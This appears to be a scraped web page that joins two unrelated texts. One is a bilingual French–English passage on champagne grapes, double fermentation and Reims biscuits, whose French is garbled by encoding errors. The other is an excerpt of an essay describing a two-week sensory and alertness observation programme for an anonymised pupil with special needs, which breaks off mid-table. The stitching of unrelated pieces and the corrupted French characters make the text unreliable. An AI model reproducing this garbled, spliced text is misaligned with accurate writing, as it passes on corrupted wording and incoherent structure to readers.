bouquet, est dà ©terminà ©e, au moins quelque peu, par les compà ©tences et la crà ©atività © du viticulteur pendant le mà ©lange. In general, there are only 3 grape varieties that are used in the production of champagne: chardonnay, pinot noir, and pinot meunier. Typically, a champagne consists of a mixture of 2 or 3 grape varieties. And so the defining feature of the wine, its taste, its color, and its bouquet, is determined, at least a little, by the skill and creativity of the wine maker during the mixing. Ce qui donne au champagne son caractà ¨re, c’est les bulles. Selon la mà ©thode champenoise, une double fermentation est utilisà ©e : la premià ¨re en cuves pour à ©laborer l’alcool, et une deuxià ¨me dans la bouteille elle-mà ªme pour produire la gazà ©ification. What gives champagne its character are the bubbles. According to the mà ©thode champenoise, a double fermentation is used: the first in vats to produce the alcohol, and a second in the bottle itself to produce the gasification. Le biscuit rose de Reims est presque aussi connu que le champagne lui-mà ªme. C’est une tradition en France de tremper ce petit biscuit dans votre flà »te de champagne. Le goà »t là ©gà ¨rement sucrà © du biscuit se combine bien avec le goà »t sec du champagne, et les deux suscitent un dà ©lice inà ©galable ! The pink biscuits of Reims are nearly as well known as the champagne itself. It is a tradition in France to dip the small biscuit in your flute of champagne. The light, sweet taste of the biscuit combines well with the dry taste of the champagne, and the two provoke an unsurpassable delight!
Monday, February 17, 2020
Pupil Z Individual Observation Program Essay Example | Topics and Well Written Essays - 1250 words
Pupil Z Individual Observation Program - Essay Example I decided I should then carry out the two-week observation programme. For one week, I have observed Pupil Z accessing school activities and leisure time in the supportive sitting position, stimulated by his hands while exploring items on his tray. In the second week, I prioritized opportunities for Pupil Z to access school activities and leisure time by lying on his back (supine position) and exploring his surroundings with his feet. These activities were a precursor to other motor skills (hands exploration), seeking to establish the impact these activities may have on his alertness, motivation and daily learning. Settings Pupil Z’s two-week individual observation programme started when he entered the school and it stopped when he left (9.30-3.30) each session / activity. Each session lasted about 25 minutes. Pupil Z’s am/pm snacks (2 x 30 minutes) included a 5 minute break, lunch (60 minutes plus 5-minute break), and 5-minute breaks between the sessions / activities. T hese breaks were not included in the total number of minutes of observation per day (200 minutes) and 1000 minutes per week. Every morning, Pupil Z had one-to-one interactions with an adult (massage). He was observed participating in class greetings, one additional group activities (e.g. sensory story, foot spa, messy play, etc.), and a self-occupation time (sensory exploration). An interval of 5 minutes was often allowed between the 25 minutes activity / sessions in order to prevent broadness and ensure that adjustments were made to fit his energy level. Every afternoon started with a self-occupation time (Little Room), followed by a sensory exploration. Next came a group activity, and the session usually ended with the whole class saying goodbye to each other. An interval of 5 minutes was allowed between activity/session. I felt it was important to provide Pupil Z with various short, repetitive, and well-cued routines (e.g. simple speech, environmental sounds, smell, body signs, e tc.) in order to help him orientate in activity, to understand what is going on, as well as to build his confidence and participation. From my privies observations of Pupil Z, I have also implemented motivating stimuli and activities during the two-week observation programme in order to motivate him (Appendix, 4). I have used the school timetabling curriculum forms for key stage 2 (see Timetable 2 and 3) to present my findings. The observation gathered on the observation form, (timetabling curriculum forms) were filled in traffic lights; green, orange, red and blue (Table 2 and 3). This overall description of the alertness categories of Pupil Z was complemented in agreement with class staff, alongside example behaviour for each category where Pupil Z displayed most common behaviour during school days. Table 1 Descriptions of Pupil Z different alertness levels Alertness level Colour Description Behaviour Active, focused on the environment Green Engaged in sensory activities (e.g., li stening, touching, smelling, etc.). Focused on other individuals or on materials in the classroom. Eyes open, head movements, body activity, reaching toward / for object(s), smiles, laugh and made some other types of vocalisation. Inactive, withdrawn Orange Focused on himself or without any focus. Activities are not directed to the environment. Flat posture, head down or turn
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